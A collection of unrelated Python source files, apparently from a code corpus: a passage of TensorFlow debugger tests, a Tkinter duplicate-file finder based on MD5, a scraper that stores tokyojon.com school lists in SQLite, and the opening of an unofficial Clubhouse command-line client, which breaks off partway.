    # NOTE(review): x and y reuse the "mismatch/" name prefix from the next
    # test — likely a copy-paste leftover in the names; harmless here.
    x = array_ops.transpose(ph, name="mismatch/x")
    y = array_ops.squeeze(ph, name="mismatch/y")

    _, dump1 = self._debug_run_and_get_dump(
        sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=1)
    self.assertEqual(1, dump1.core_metadata.global_step)
    self.assertGreaterEqual(dump1.core_metadata.session_run_index, 0)
    self.assertEqual(0, dump1.core_metadata.executor_step_index)
    self.assertEqual([ph.name], dump1.core_metadata.input_names)
    self.assertEqual([x.name], dump1.core_metadata.output_names)
    self.assertEqual([], dump1.core_metadata.target_nodes)
    shutil.rmtree(self._dump_root)

    # Calling run() with the same feed, same output and same debug watch
    # options should increment both session_run_index and
    # executor_step_index.
    _, dump2 = self._debug_run_and_get_dump(
        sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=2)
    self.assertEqual(2, dump2.core_metadata.global_step)
    self.assertEqual(dump1.core_metadata.session_run_index + 1,
                     dump2.core_metadata.session_run_index)
    self.assertEqual(dump1.core_metadata.executor_step_index + 1,
                     dump2.core_metadata.executor_step_index)
    self.assertEqual([ph.name], dump2.core_metadata.input_names)
    self.assertEqual([x.name], dump2.core_metadata.output_names)
    self.assertEqual([], dump2.core_metadata.target_nodes)
    shutil.rmtree(self._dump_root)

    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options, sess.graph, debug_urls=self._debug_urls(), global_step=3)

    # Calling run() with a different output should increment
    # session_run_index, but not executor_step_index.
    _, dump3 = self._debug_run_and_get_dump(
        sess, y, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=3)
    self.assertEqual(3, dump3.core_metadata.global_step)
    self.assertEqual(dump2.core_metadata.session_run_index + 1,
                     dump3.core_metadata.session_run_index)
    self.assertEqual(0, dump3.core_metadata.executor_step_index)
    self.assertEqual([ph.name], dump3.core_metadata.input_names)
    self.assertEqual([y.name], dump3.core_metadata.output_names)
    self.assertEqual([], dump3.core_metadata.target_nodes)
def testDebuggingDuringOpError(self):
  """Test the debug tensor dumping when error occurs in graph runtime."""
  with session.Session() as sess:
    ph = array_ops.placeholder(dtypes.float32, name="mismatch/ph")
    x = array_ops.transpose(ph, name="mismatch/x")
    m = constant_op.constant(
        np.array(
            [[1.0, 2.0]], dtype=np.float32), name="mismatch/m")
    # Shape-mismatched matmul: fails at runtime once ph is fed below.
    y = math_ops.matmul(m, x, name="mismatch/y")

    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=["DebugIdentity"],
        debug_urls=self._debug_urls())

    with self.assertRaises(errors.OpError):
      sess.run(y,
               options=run_options,
               feed_dict={ph: np.array([[-3.0], [0.0]])})

    dump = debug_data.DebugDumpDir(self._dump_root)

    # Core metadata is written even though the run errored out.
    self.assertGreaterEqual(dump.core_metadata.session_run_index, 0)
    self.assertGreaterEqual(dump.core_metadata.executor_step_index, 0)
    self.assertEqual([ph.name], dump.core_metadata.input_names)
    self.assertEqual([y.name], dump.core_metadata.output_names)
    self.assertEqual([], dump.core_metadata.target_nodes)

    # Despite the fact that the run() call errored out and partition_graphs
    # are not available via run_metadata, the partition graphs should still
    # have been loaded from the dump directory.
    self.assertTrue(dump.loaded_partition_graphs())

    m_dumps = dump.watch_key_to_data("mismatch/m:0:DebugIdentity")
    self.assertEqual(1, len(m_dumps))
    self.assertAllClose(np.array([[1.0, 2.0]]), m_dumps[0].get_tensor())

    x_dumps = dump.watch_key_to_data("mismatch/x:0:DebugIdentity")
    self.assertEqual(1, len(x_dumps))
    self.assertAllClose(np.array([[-3.0, 0.0]]), x_dumps[0].get_tensor())
def testDebugNumericSummaryOnInitializedTensorGivesCorrectResult(self):
  """DebugNumericSummary emits correct statistics for an initialized tensor."""
  with session.Session(config=no_rewrite_session_config()) as sess:
    # 18 elements: 4 nan, 2 -inf, 2 negative, 3 zero, 2 positive, 5 +inf.
    a = variables.Variable(
        [
            np.nan, np.nan, 0.0, 0.0, 0.0, -1.0, -3.0, 3.0, 7.0, -np.inf,
            -np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.nan, np.nan
        ],
        dtype=np.float32,
        name="numeric_summary/a")
    b = variables.Variable(
        [0.0] * 18, dtype=np.float32, name="numeric_summary/b")
    c = math_ops.add(a, b, name="numeric_summary/c")

    sess.run(variables.global_variables_initializer())

    _, dump = self._debug_run_and_get_dump(
        sess, c, debug_ops=["DebugNumericSummary"])
    self.assertTrue(dump.loaded_partition_graphs())

    # Expected summary matches the element categories above, followed by
    # min (-3), max (7), mean and variance of the finite elements, then
    # dtype enum, ndims and the dimension size.
    self.assertAllClose([[
        1.0, 18.0, 4.0, 2.0, 2.0, 3.0, 2.0, 5.0, -3.0, 7.0, 0.85714286,
        8.97959184, 1.0, 1.0, 18.0
    ]], dump.get_tensors("numeric_summary/a/read", 0, "DebugNumericSummary"))
def testDebugNumericSummaryOnUninitializedTensorGivesCorrectResult(self):
  """DebugNumericSummary reports an all-zero-count summary before init."""
  with session.Session() as sess:
    a = variables.Variable(
        [42], dtype=np.float32, name="numeric_summary_uninit/a")

    _, dump = self._debug_run_and_get_dump(
        sess, a.initializer, debug_ops=["DebugNumericSummary"])
    self.assertTrue(dump.loaded_partition_graphs())

    # DebugNumericSummary output should reflect the uninitialized state of
    # the watched tensor.
    numeric_summary = dump.get_tensors("numeric_summary_uninit/a", 0,
                                       "DebugNumericSummary")[0]
    self.assertAllClose([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                        numeric_summary[0:8])
    # Check dtype (index 12), ndims (index 13) and dimension sizes (index
    # 14+).
    self.assertAllClose([1.0, 1.0, 1.0], numeric_summary[12:])

    # With no elements: min (index 8) is +inf, max (index 9) is -inf, and
    # mean/variance (indices 10, 11) are nan.
    self.assertTrue(np.isinf(numeric_summary[8]))
    self.assertGreater(numeric_summary[8], 0.0)
    self.assertTrue(np.isinf(numeric_summary[9]))
    self.assertLess(numeric_summary[9], 0.0)
    self.assertTrue(np.isnan(numeric_summary[10]))
    self.assertTrue(np.isnan(numeric_summary[11]))
def testDebugNumericSummaryFailureIsToleratedWhenOrdered(self):
  """tolerate_debug_op_creation_failures skips un-debuggable string tensors."""
  with session.Session() as sess:
    a = variables.Variable("1", name="a")
    b = variables.Variable("3", name="b")
    c = variables.Variable("2", name="c")
    # String add is concatenation: "1" + "3" + "2" -> "132".
    d = math_ops.add(a, b, name="d")
    e = math_ops.add(d, c, name="e")
    n = parsing_ops.string_to_number(e, name="n")
    m = math_ops.add(n, n, name="m")
    sess.run(variables.global_variables_initializer())

    # Using DebugNumericSummary on sess.run(m) with the default
    # tolerate_debug_op_creation_failures=False should error out due to the
    # presence of string-dtype Tensors in the graph.
    run_metadata = config_pb2.RunMetadata()
    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=["DebugNumericSummary"],
        debug_urls=self._debug_urls())
    with self.assertRaises(errors.FailedPreconditionError):
      sess.run(m, options=run_options, run_metadata=run_metadata)

    # Using tolerate_debug_op_creation_failures=True should get rid of the
    # error.
    m_result, dump = self._debug_run_and_get_dump(
        sess, m, debug_ops=["DebugNumericSummary"],
        tolerate_debug_op_creation_failures=True)
    # n = 132; m = n + n = 264.
    self.assertEqual(264, m_result)

    # The integer-dtype Tensors in the graph should have been dumped
    # properly.
    self.assertIn("n:0:DebugNumericSummary", dump.debug_watch_keys("n"))
    self.assertIn("m:0:DebugNumericSummary", dump.debug_watch_keys("m"))
def testDebugNumericSummaryInvalidAttributesStringAreCaught(self):
  """Invalid attribute keys in a debug-op spec fail with a clear error."""
  with session.Session(config=no_rewrite_session_config()) as sess:
    a = variables.Variable(10.0, name="a")
    b = variables.Variable(0.0, name="b")
    c = variables.Variable(0.0, name="c")
    x = math_ops.divide(a, b, name="x")
    y = math_ops.multiply(x, c, name="y")
    sess.run(variables.global_variables_initializer())

    # A single unknown attribute key ("foo") is reported by name.
    run_metadata = config_pb2.RunMetadata()
    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=["DebugNumericSummary(foo=1.0)"],
        debug_urls=self._debug_urls())
    with self.assertRaisesRegexp(
        errors.FailedPreconditionError,
        r"1 attribute key\(s\) were not valid for debug node "
        r"__dbg_.:0_0_DebugNumericSummary: foo"):
      sess.run(y, options=run_options, run_metadata=run_metadata)

    # Two unknown attribute keys are both counted in the error.
    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=["DebugNumericSummary(foo=1.0; bar=false)"],
        debug_urls=self._debug_urls())
    with self.assertRaisesRegexp(
        errors.FailedPreconditionError,
        r"2 attribute key\(s\) were not valid for debug node "
        r"__dbg_.:0_0_DebugNumericSummary:"):
      sess.run(y, options=run_options, run_metadata=run_metadata)

    # A mix of one invalid key and one valid key (mute_if_healthy) still
    # reports only the invalid one ("foo").
    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=["DebugNumericSummary(foo=1.0; mute_if_healthy=true)"],
        debug_urls=self._debug_urls())
    with self.assertRaisesRegexp(
        errors.FailedPreconditionError,
        r"1 attribute key\(s\) were not valid for debug node "
        r"__dbg_.:0_0_DebugNumericSummary: foo"):
      sess.run(y, options=run_options, run_metadata=run_metadata)
def testDebugNumericSummaryMuteOnHealthyMutesOnlyHealthyTensorDumps(self):
  """mute_if_healthy=true dumps only tensors containing inf/nan."""
  with session.Session(config=no_rewrite_session_config()) as sess:
    a = variables.Variable(10.0, name="a")
    b = variables.Variable(0.0, name="b")
    c = variables.Variable(0.0, name="c")
    x = math_ops.divide(a, b, name="x")  # 10 / 0 -> inf
    y = math_ops.multiply(x, c, name="y")  # inf * 0 -> nan
    sess.run(variables.global_variables_initializer())

    # Here, validate=False is necessary to avoid causality check error.
    # TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
    # debug ops with mute_if_healthy=false attribute during validation.
    _, dump = self._debug_run_and_get_dump(
        sess, y, debug_ops=["DebugNumericSummary(mute_if_healthy=true)"],
        validate=False)

    # Only the two unhealthy tensors (x with +inf, y with nan) are dumped.
    self.assertEqual(2, dump.size)
    self.assertAllClose([[
        1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, np.inf, -np.inf, np.nan,
        np.nan, 1.0, 0.0
    ]], dump.get_tensors("x", 0, "DebugNumericSummary"))
    self.assertAllClose([[
        1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, np.inf, -np.inf, np.nan,
        np.nan, 1.0, 0.0
    ]], dump.get_tensors("y", 0, "DebugNumericSummary"))

    # Another run with the default mute_if_healthy (false) value should
    # dump all the tensors.
    shutil.rmtree(self._dump_root)
    _, dump = self._debug_run_and_get_dump(
        sess, y, debug_ops=["DebugNumericSummary()"])
    self.assertEqual(8, dump.size)
def testDebugNumericSummaryMuteOnHealthyAndCustomBoundsWork(self):
  """A custom upper_bound with mute_if_healthy flags out-of-range tensors."""
  with session.Session() as sess:
    a = variables.Variable([10.0, 10.0], name="a")
    b = variables.Variable([10.0, 2.0], name="b")
    x = math_ops.add(a, b, name="x")  # [20.0, 12.0]
    y = math_ops.divide(x, b, name="y")  # [2.0, 6.0]
    sess.run(variables.global_variables_initializer())

    # Here, validate=False is necessary to avoid causality check error.
    # TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
    # debug ops with mute_if_healthy=false attribute during validation.
    _, dump = self._debug_run_and_get_dump(
        sess, y, debug_ops=[
            "DebugNumericSummary(mute_if_healthy=true; upper_bound=11.0)"],
        validate=False)

    # Only x ([20, 12]) exceeds the upper bound of 11; y is muted.
    self.assertEqual(1, dump.size)
    self.assertAllClose([[
        1.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 12.0, 20.0, 16.0, 16.0, 1.0,
        1.0, 2.0]], dump.get_tensors("x", 0, "DebugNumericSummary"))
def testDebugQueueOpsDoesNotoErrorOut(self):
  """Queue ops produce InconvertibleTensorProto dumps without erroring."""
  # NOTE(review): "Noto" in the method name is a typo for "Not"; kept so
  # any test-name-based filters keep matching.
  with session.Session() as sess:
    q = data_flow_ops.FIFOQueue(3, "float", name="fifo_queue")
    q_init = q.enqueue_many(([101.0, 202.0, 303.0],), name="enqueue_many")

    _, dump = self._debug_run_and_get_dump(sess, q_init)
    self.assertTrue(dump.loaded_partition_graphs())

    # The queue handle cannot be converted to a numpy array; it is dumped
    # as an InconvertibleTensorProto marked as initialized instead.
    fifo_queue_tensor = dump.get_tensors("fifo_queue", 0, "DebugIdentity")[0]
    self.assertIsInstance(fifo_queue_tensor,
                          debug_data.InconvertibleTensorProto)
    self.assertTrue(fifo_queue_tensor.initialized)

    self.assertAllClose(
        [101.0, 202.0, 303.0],
        dump.get_tensors("enqueue_many/component_0", 0, "DebugIdentity")[0])
def testLookUpNodePythonTracebackWorks(self):
  """node_traceback() works once the Python graph has been set on the dump."""
  with session.Session() as sess:
    u_init = constant_op.constant(10.0)
    u = variables.Variable(u_init, name="traceback/u")
    v_init = constant_op.constant(20.0)
    v = variables.Variable(v_init, name="traceback/v")

    w = math_ops.multiply(u, v, name="traceback/w")

    sess.run(variables.global_variables_initializer())
    _, dump = self._debug_run_and_get_dump(sess, w)

    # Prior to setting the Python graph, attempts to do traceback lookup
    # should lead to exceptions.
    with self.assertRaisesRegexp(
        LookupError, "Python graph is not available for traceback lookup"):
      dump.node_traceback("traceback/w")

    dump.set_python_graph(sess.graph)

    # After setting the Python graph, attempts to look up nonexistent nodes
    # should lead to exceptions.
    with self.assertRaisesRegexp(KeyError,
                                 r"Cannot find node \"foo\" in Python graph"):
      dump.node_traceback("foo")

    # Lookup should work with node name input.
    traceback = dump.node_traceback("traceback/w")
    self.assertIsInstance(traceback, list)
    self.assertGreater(len(traceback), 0)
    for trace in traceback:
      self.assertIsInstance(trace, tuple)

    # Lookup should also work with tensor name input.
    traceback = dump.node_traceback("traceback/w:0")
    self.assertIsInstance(traceback, list)
    self.assertGreater(len(traceback), 0)
    for trace in traceback:
      self.assertIsInstance(trace, tuple)
class DebugConcurrentRunCallsTest(test_util.TensorFlowTestCase):
  """Test for debugging concurrent Session.run() calls."""

  def _get_concurrent_debug_urls(self):
    """Abstract method to generate debug URLs for concurrent debugged runs."""
    raise NotImplementedError(
        "_get_concurrent_debug_urls is not implemented in the base test class")

  def testDebugConcurrentVariableUpdates(self):
    """Concurrent debugged runs produce consistent dumps and metadata."""
    if test.is_gpu_available():
      self.skipTest("No testing concurrent runs on a single GPU.")

    with session.Session() as sess:
      v = variables.Variable(30.0, name="v")
      constants = []
      for i in xrange(self._num_concurrent_runs):
        constants.append(constant_op.constant(1.0, name="c%d" % i))
      incs = [
          state_ops.assign_add(
              v, c, use_locking=True, name=("inc%d" % i))
          for (i, c) in enumerate(constants)
      ]
      sess.run(v.initializer)

      concurrent_debug_urls = self._get_concurrent_debug_urls()

      def inc_job(index):
        # Each job runs 100 debugged increments against its own dump root.
        run_options = config_pb2.RunOptions(output_partition_graphs=True)
        debug_utils.watch_graph(
            run_options, sess.graph, debug_urls=concurrent_debug_urls[index])
        for _ in xrange(100):
          sess.run(incs[index], options=run_options)

      inc_threads = []
      for index in xrange(self._num_concurrent_runs):
        inc_thread = threading.Thread(target=functools.partial(inc_job, index))
        inc_thread.start()
        inc_threads.append(inc_thread)
      for inc_thread in inc_threads:
        inc_thread.join()

      self.assertAllClose(30.0 + 1.0 * self._num_concurrent_runs * 100,
                          sess.run(v))

      all_session_run_indices = []
      for index in xrange(self._num_concurrent_runs):
        dump = debug_data.DebugDumpDir(self._dump_roots[index])
        self.assertTrue(dump.loaded_partition_graphs())

        v_data = dump.get_tensors("v", 0, "DebugIdentity")
        self.assertEqual(100, len(v_data))

        # Examine all the core metadata files
        core_metadata_files = glob.glob(
            os.path.join(self._dump_roots[index], "_tfdbg_core*"))

        timestamps = []
        session_run_indices = []
        executor_step_indices = []
        for core_metadata_file in core_metadata_files:
          with open(core_metadata_file, "rb") as f:
            event = event_pb2.Event()
            event.ParseFromString(f.read())
            core_metadata = (
                debug_data.extract_core_metadata_from_event_proto(event))
            timestamps.append(event.wall_time)
            session_run_indices.append(core_metadata.session_run_index)
            executor_step_indices.append(core_metadata.executor_step_index)

        all_session_run_indices.extend(session_run_indices)

        # Assert that executor_step_index increases by one at a time.
        executor_step_indices = zip(timestamps, executor_step_indices)
        executor_step_indices = sorted(
            executor_step_indices, key=lambda x: x[0])
        for i in xrange(len(executor_step_indices) - 1):
          # Use assertEqual: assertEquals is a deprecated alias, and the
          # rest of this file consistently uses assertEqual.
          self.assertEqual(executor_step_indices[i][1] + 1,
                           executor_step_indices[i + 1][1])

        # Assert that session_run_index increase monotonically.
        session_run_indices = zip(timestamps, session_run_indices)
        session_run_indices = sorted(session_run_indices, key=lambda x: x[0])
        for i in xrange(len(session_run_indices) - 1):
          self.assertGreater(session_run_indices[i + 1][1],
                             session_run_indices[i][1])

      # Assert that the session_run_indices from the concurrent run() calls are
      # all unique.
      self.assertEqual(len(all_session_run_indices),
                       len(set(all_session_run_indices)))
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  googletest.main()
|
main.py | import os
import shutil
from time import sleep
import threading
import tkinter as tk
from tkinter import filedialog
import hashlib
# Simple duplicate-file comparison tool (Tk GUI), version 0.2.
print('简易文件比对TOOL=====V0.2')

# Directory being scanned; the initial value means "not yet set".
work_dir = '暂未设定'
# Maximum number of concurrent comparison jobs (user-configurable below).
lineNub = 10
# NOTE(review): 'filename' is declared but never meaningfully used.
filename = 0
# Count of comparison jobs dispatched so far (used as a crude throttle).
nowline = int(0)
# Paths of duplicate files already copied into an MD5-named folder.
filelist = []

root = tk.Tk()
root.title('简易文件比对V0.1===真的假的鸭?')
root.geometry('550x100')

# Tk string variables mirrored in the UI labels below.
lineNub_show = tk.StringVar()
lineNub_show.set(lineNub)
work_dir_show = tk.StringVar()
work_dir_show.set(work_dir)
def CpToNewMkdir(md5, file2):
    """Copy *file2* into the MD5-named subfolder and record it for deletion."""
    destination = os.path.join(work_dir, md5)
    shutil.copy(file2, destination)
    filelist.append(file2)
def getFileMd5(filename):
    """Return the uppercase hex MD5 digest of the file at *filename*.

    Reads in fixed-size chunks so arbitrarily large files do not have to
    fit in memory, and uses a context manager so the handle is closed
    even if reading raises (the original read the whole file at once and
    leaked the handle on error).
    """
    filemd5 = hashlib.md5()
    with open(filename, 'rb') as thisfile:
        # 1 MiB chunks: large enough for throughput, small enough for RAM.
        for chunk in iter(lambda: thisfile.read(1024 * 1024), b''):
            filemd5.update(chunk)
    return filemd5.hexdigest().upper()
def Compared_MD5(md5, filepath):
    """Scan work_dir for files (other than *filepath*) whose MD5 equals *md5*
    and copy each one into the <work_dir>/<md5> folder.

    Fixes: in the original, the copy only happened in the branch that
    created the md5 folder, so once the folder existed further duplicates
    were silently skipped.  The dead ``else: pass`` branches are gone.
    """
    for name in os.listdir(work_dir):
        candidate = os.path.join(work_dir, name)
        # Skip directories and the file we are comparing against.
        if not os.path.isfile(candidate) or candidate == filepath:
            continue
        if getFileMd5(candidate) == md5:
            target_dir = os.path.join(work_dir, md5)
            # NOTE(review): several threads may race here; isdir+mkdir is
            # not atomic -- confirm whether a lock or makedirs is wanted.
            if not os.path.isdir(target_dir):
                os.mkdir(target_dir)
            CpToNewMkdir(md5, candidate)
def getDir():
    """Ask the user for the working directory and publish it to the UI label."""
    global work_dir
    work_dir = filedialog.askdirectory()
    work_dir_show.set(work_dir)
def find_run(md5, filepath):
    """Run Compared_MD5 on a worker thread, throttled to at most
    ``lineNub`` concurrent workers.

    Fixes: the original called ``Thread.run()``, which executes the target
    synchronously in the calling thread (no concurrency at all), and it
    never decremented ``nowline``, so the throttle would eventually block
    forever once ``start()`` was used.
    """
    global nowline
    while nowline > int(lineNub):
        sleep(0.05)
    nowline = nowline + 1

    def _worker():
        global nowline
        try:
            Compared_MD5(md5, filepath)
        finally:
            # Release the throttle slot even if the comparison raises.
            nowline = nowline - 1

    threading.Thread(target=_worker).start()
def main():
    """Hash every file directly under work_dir and launch a duplicate
    comparison for each, then show a 'finished' window."""
    global filename
    for name in os.listdir(work_dir):
        file_absolute_path = os.path.join(work_dir, name)
        if os.path.isfile(file_absolute_path):
            print(name)
            filemd5 = getFileMd5(file_absolute_path)
            find_run(filemd5, file_absolute_path)
        else:
            pass
    # NOTE(review): creating a second tk.Tk() while `root` is alive is
    # fragile; a tk.Toplevel would be the conventional choice -- confirm.
    er = tk.Tk()
    er.geometry('700x500')
    text = tk.Label(er, text='在指定文件夹下对比结束')
    text.grid(row=0, column=0)
    er.mainloop()
def del_aft_cp():
    """Delete every original file that was previously copied into an MD5 folder."""
    for duplicated in list(filelist):
        os.remove(duplicated)
def mainrun():
    """Kick off the scan on a background thread so the GUI stays responsive."""
    worker = threading.Thread(target=main)
    worker.start()
def set_lineNub():
    """Read the max-thread-count entry and apply it.

    Fixes: the original stored the raw string from the Entry widget; a
    non-numeric value then crashed ``find_run``'s ``int(lineNub)`` cast.
    Invalid input is now ignored.
    """
    global lineNub
    raw = set_lineNub_entry.get()
    try:
        lineNub = int(raw)
    except ValueError:
        return  # keep the previous, valid value
    lineNub_show.set(lineNub)
# --- widget construction and layout -------------------------------------
set_dir_bt = tk.Button(root, text='设置工作目录', command=getDir)
start_bt = tk.Button(root, text='开始对比', command=mainrun)
del_bt = tk.Button(root, text='重复文件移动至MD5命名的文件夹之后,从工作文件夹中删除', command=del_aft_cp)
work_dir_print = tk.Label(root, textvariable=work_dir_show)
set_lineNub_entry = tk.Entry(root)
set_lineNub_bt = tk.Button(root, text='设置最大比对线程数,默认10', command=set_lineNub)
lineNub_print = tk.Label(root, textvariable=lineNub_show)
# Row 0: directory picker, row 1: thread-count controls, row 2: actions.
set_dir_bt.grid(row=0, column=0)
work_dir_print.grid(row=0, column=1)
set_lineNub_bt.grid(row=1, column=0)
set_lineNub_entry.grid(row=1, column=1)
lineNub_print.grid(row=1, column=2)
start_bt.grid(row=2, column=0)
del_bt.grid(row=2, column=1)
root.mainloop()
# ==============================================================================================================
|
KoreaData.py | import sqlite3
import urllib2
import re
from threading import Thread
class Koreanlist:
    """Scrapes a tokyojon.com school-list page and mirrors it into SQLite.

    The downloaded page is cached on disk (<list_type>.txt); the table is
    only rewritten when the fresh page differs from the cached copy.
    """

    def __init__(self, list_type, cursor):
        self.list_type = list_type          # e.g. "greenlist"; also the table name
        self.webpage = ""                   # raw HTML, filled lazily by checkWebpage()
        self.cursor = cursor                # sqlite3 cursor used for all writes
        self.filename = list_type + ".txt"  # on-disk cache of the last page seen

    def update(self):
        """Create the table if needed and refresh it when the page changed."""
        self.cursor.execute("CREATE TABLE IF NOT EXISTS " + self.list_type + " (company)")
        self.checkWebpage()
        if self._webpageUpdated():
            self._saveWebpage()
            self._updateTable()

    def checkWebpage(self):
        """Download the page once; safe to call repeatedly (and from a thread)."""
        if self.webpage == "":
            self.webpage = self._html("http://" + self.list_type + ".tokyojon.com/")

    def _html(self, url):
        return urllib2.urlopen(url).read()

    def _webpageUpdated(self):
        # BUG FIX: the original used ``is not``, which compares object
        # identity -- two equal strings always counted as "updated", so the
        # table was re-populated (and duplicated) on every run.
        return self.webpage != self._savedPage()

    def _saveWebpage(self):
        with open(self.filename, 'w') as f:
            f.write(self.webpage)

    def _savedPage(self):
        try:
            with open(self.filename, 'r') as f:
                return f.read()
        except (IOError, OSError):
            # No cached copy yet -- treat as empty so any page counts as new.
            return ""

    def _updateTable(self):
        # Extract company names following "Subject:" markers in the HTML.
        subjects = re.findall("ubject:[</span>]*([\w| |\-|\,]{6,})", self.webpage)
        subject_tuples = [(self._prettyPrint(subject), ) for subject in subjects]
        self.cursor.executemany("INSERT INTO " + self.list_type + "(company) VALUES (?)", subject_tuples)

    def _prettyPrint(self, string):
        return string.strip().lower()
class Greenlist(Koreanlist):
    """Koreanlist bound to the 'greenlist' page/table."""
    def __init__(self, cursor):
        Koreanlist.__init__(self, "greenlist", cursor)
class Blacklist(Koreanlist):
    """Koreanlist bound to the 'blacklist' page/table."""
    def __init__(self, cursor):
        Koreanlist.__init__(self, "blacklist", cursor)
def updateDatabase():
    """Fetch both list pages concurrently, then update schools.db serially.

    NOTE(review): both lists share one sqlite cursor and the connection is
    opened with check_same_thread=False; only the network fetch runs on
    threads, the DB writes stay on this thread -- confirm that invariant
    holds if this is extended.
    """
    conn = sqlite3.connect("schools.db", check_same_thread=False)
    cursor = conn.cursor()
    lists = [Greenlist(cursor), Blacklist(cursor)]
    _checkWebpages(lists)
    _updateLists(lists)
    conn.commit()
def _checkWebpages(lists):
    """Download every list's webpage concurrently and wait for completion.

    Fixes: the original passed ``l.checkWebpage()`` -- calling the method
    immediately on the main thread and handing ``Thread`` its return value
    (``None``) as the target, so the "threads" did nothing.  Pass the bound
    method itself instead.
    """
    threads = [_makeThread(l.checkWebpage, ()) for l in lists]
    _joinThreads(threads)
def _makeThread(function, arguments):
    """Start *function* on a fresh thread with *arguments*; return the thread."""
    worker = Thread(target=function, args=arguments)
    worker.start()
    return worker
def _joinThreads(threads):
    """Block until every thread in *threads* has finished."""
    for worker in threads:
        worker.join()
def _updateLists(lists):
    """Run the (serial) database update for every list object."""
    for entry in lists:
        entry.update()
|
cli.py | """
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
import sys
import time
# Set some global variables
# RTC stays None when the optional agorartc package is missing; all audio
# features are then disabled and the CLI runs in text-only mode.
try:
    import agorartc
    RTC = agorartc.createRtcEngineBridge()
    eventHandler = agorartc.RtcEngineEventHandlerBase()
    RTC.initEventHandler(eventHandler)
    # 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
    RTC.initialize(Clubhouse.AGORA_KEY, None,
                   agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
    # Enhance voice quality
    if RTC.setAudioProfile(
            agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
            agorartc.AUDIO_SCENARIO_GAME_STREAMING
    ) < 0:
        print("[-] Failed to set the high quality audio profile")
except ImportError:
    RTC = None
def set_interval(interval):
    """ (int) -> decorator
    Decorator factory: run the wrapped function every *interval* seconds on
    a daemon thread until it returns a falsy value.  Calling the decorated
    function returns a threading.Event; .set() it to stop the loop early.
    """
    def decorator(func):
        def wrapper(*args, **kwargs):
            stop_event = threading.Event()

            def _runner():
                # Event.wait doubles as the sleep; a set() wakes us and
                # terminates the loop immediately.
                while not stop_event.wait(interval):
                    if not func(*args, **kwargs):
                        break

            worker = threading.Thread(target=_runner, daemon=True)
            worker.start()
            return stop_event
        return wrapper
    return decorator
def write_config(user_id, user_token, user_device, filename='setting.ini'):
    """ (str, str, str, str) -> bool
    Persist the account credentials to *filename*; return True on success.
    """
    config = configparser.ConfigParser()
    config.add_section("Account")
    # Same insertion order as before so the file layout is unchanged.
    config.set("Account", "user_device", user_device)
    config.set("Account", "user_id", user_id)
    config.set("Account", "user_token", user_token)
    with open(filename, 'w') as config_file:
        config.write(config_file)
    return True
def read_config(filename='setting.ini'):
    """ (str) -> dict of str
    Load the saved Account section; an empty dict when absent.
    """
    config = configparser.ConfigParser()
    config.read(filename)
    if "Account" not in config:
        return dict()
    return dict(config['Account'])
def process_onboarding(client):
    """ (Clubhouse) -> NoneType
    This is to process the initial setup for the first time user.
    Interactively prompts for legal name and username, validates them
    locally, then pushes them to the server until registration succeeds.
    """
    print("=" * 30)
    print("Welcome to Clubhouse!\n")
    print("The registration is not yet complete.")
    print("Finish the process by entering your legal name and your username.")
    print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
    print("         YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
    print("=" * 30)
    while True:
        user_realname = input("[.] Enter your legal name (John Smith): ")
        user_username = input("[.] Enter your username (elonmusk1234): ")
        user_realname_split = user_realname.split(" ")
        # Require exactly "<first> <last>" so update_name gets a full name.
        if len(user_realname_split) != 2:
            print("[-] Please enter your legal name properly.")
            continue
        if not (user_realname_split[0].isalpha() and
                user_realname_split[1].isalpha()):
            print("[-] Your legal name is supposed to be written in alphabets only.")
            continue
        if len(user_username) > 16:
            print("[-] Your username exceeds above 16 characters.")
            continue
        if not user_username.isalnum():
            print("[-] Your username is supposed to be in alphanumerics only.")
            continue
        client.update_name(user_realname)
        result = client.update_username(user_username)
        if not result['success']:
            print(f"[-] You failed to update your username. ({result})")
            continue
        result = client.check_waitlist_status()
        if not result['success']:
            print("[-] Your registration failed.")
            print(f"    It's better to sign up from a real device. ({result})")
            continue
        print("[-] Registration Complete!")
        print("    Try registering by real device if this process pops again.")
        break
def print_channel_list(client, max_limit=20):
    """ (Clubhouse) -> NoneType
    Print up to *max_limit* currently available channels as a rich table.
    """
    console = Console()
    table = Table(show_header=True, header_style="bold magenta")
    table.add_column("")
    table.add_column("channel_name", style="cyan", justify="right")
    table.add_column("topic")
    table.add_column("speaker_count")
    channels = client.get_channels()['channels']
    for index, channel in enumerate(channels):
        if index >= max_limit:
            break
        # Marker glyph for social-mode / private rooms.
        marker = "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
        table.add_row(
            str(marker),
            str(channel['channel']),
            str(channel['topic']),
            str(int(channel['num_speakers'])),
        )
    console.print(table)
def chat_main(client):
    """ (Clubhouse) -> NoneType
